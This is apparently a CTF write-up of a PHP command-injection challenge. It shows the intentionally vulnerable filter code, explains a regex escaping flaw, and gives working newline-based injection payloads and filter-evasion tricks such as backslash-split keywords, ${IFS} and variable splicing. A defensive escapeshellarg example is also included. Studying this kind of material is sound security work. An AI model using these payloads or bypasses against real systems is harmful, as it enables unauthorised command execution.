UNCTF: write-up of a command-filter bypass

0x01 The challenge code

<?php
    highlight_file(__FILE__);
    $a = $_GET['a'];
    $b = $_GET['b'];

    // try bypass it
    // Note: the if statements have no braces, so only `$a = "";` / `$b = "";`
    // is conditional; the quoting on the following line always runs.
    if (preg_match("/\'|\"|,|;|\`|\\|\*|\n|\t|\xA0|\r|\{|\}|\(|\)|<|\&[^\d]|@|\||tail|bin|less|more|string|nl|pwd|cat|sh|flag|find|ls|grep|echo|w/is", $a))
        $a = "";
    $a = '"' . $a . '"';
    if (preg_match("/\'|\"|;|,|\`|\*|\\|\n|\t|\r|\xA0|\{|\}|\(|\)|<|\&[^\d]|@|\||tail|bin|less|more|string|nl|pwd|cat|sh|flag|find|ls|grep|echo|w/is", $b))
        $b = "";
    $b = '"' . $b . '"';
    $cmd = "file $a $b";
    str_replace(" ","","$cmd");  // return value is discarded, so this removes nothing
    system($cmd);
?>


0x02 Analysis

The filter first blocks cat, more, flag and other keywords. These can be bypassed by inserting a backslash into the word, for example c\at or fla\g.php (the reason is that the challenge's preg_match writes the backslash as \\, which here amounts to not filtering \ at all). We also know that on Linux a newline can serve as a command separator.
This is a small PHP regex pitfall: in a double-quoted PHP string, two backslashes are reduced to a single backslash, and that single backslash is then handed to the regex engine, where it escapes the character that follows.
Because of this flaw, for $a the pattern filters the sequence |* instead of *, and for $b it filters |\n instead of \n.
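As an added example (not from the challenge or the original post), the following PHP puts the escaping pitfall described above next to a pattern that PCRE receives as intended, and then shows the quoting approach that removes the need for a keyword blacklist; the isBlocked helper and the probe values are constructed for this illustration.

```php
<?php
// Added example, not part of the original challenge code.
//
// 1) The escaping pitfall. In a double-quoted PHP string "\\" becomes "\" and
//    "\n" becomes a real line feed, so PCRE receives  \|\*|<LF>  : one alternative
//    matching the literal text "|*" and one matching LF. A lone "\" or "*" passes.
//    (In the challenge the neighbour of "\\" decides what slips through: "\\|\*"
//    in the $a pattern lets "*" pass, "\\|\n" in the $b pattern lets a newline pass.)
$weak = "/\\|\*|\n/";

// In a single-quoted string only \\ and \' are processed, so PCRE receives
// \\|\*|\n : three separate alternatives for backslash, star and line feed.
$fixed = '/\\\\|\*|\n/';

function isBlocked(string $pattern, string $input): bool
{
    return preg_match($pattern, $input) === 1;
}

// Constructed probe values: one character each, plus the two-character "|*".
$probes = ['\\' => 'backslash', '*' => 'star', "\n" => 'newline', '|*' => 'pipe-star'];
foreach ($probes as $probe => $name) {
    printf("%-10s weak=%d fixed=%d\n", $name, isBlocked($weak, $probe), isBlocked($fixed, $probe));
}

// 2) The durable fix is shell-safe quoting rather than a longer blacklist.
//    escapeshellarg() wraps the value in single quotes (escaping any embedded
//    single quote), so a newline or backslash stays inside one argument instead
//    of acting as a command separator or an escape character.
$a = '\\';                      // the write-up's a=\ after URL decoding
$b = "\nca\\t index.php\n";     // the write-up's b=%0Aca\t%20index.php%0A after URL decoding
$cmd = 'file ' . escapeshellarg($a) . ' ' . escapeshellarg($b);
var_dump($cmd);
```

Run it with the PHP CLI; the table shows which probes each pattern rejects, and the final var_dump shows both values kept inside single-quoted arguments.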

payload: http://127.0.0.1/?a=\&b=%0Aca\t%20index.php%0A
var_dump($cmd) gives string(27) "file "\" "\nca\t index.php\n"" (each \n here stands for an actual line break in the string).



0x03 Knowledge summary

1. Inserting a backslash into a command keyword bypasses keyword filters.
2. Slicing an environment variable, such as ${path:0:1}, can also be used for a bypass, but { and } are filtered here, so that method does not apply. The env command displays all environment variables.
3. There are two further ways around command filtering: the Linux wildcard ? (for example var written as v?r), and ${IFS} in place of spaces, as in the following example:

expr${IFS}substr${IFS}"this is a test"${IFS}3${IFS}5

4. Commands can also be assembled by splicing variables, e.g. a=1;b=s;$a$b. Since ; is filtered, the semicolons are replaced with %0A newlines: http://127.0.0.1/?a=\&b=%0Ac=ca%0Ad=t%0A$c$d index.php%0A
5. Different systems use different line endings:

  • On Unix, each line ends with only a <line feed>, i.e. "\n" (%0A)
  • On Windows, each line ends with <carriage return><line feed>, i.e. "\r\n"
  • On the Mac, each line ends with a <carriage return>, i.e. "\r" (%0D)

Origin blog.csdn.net/a3320315/article/details/102776426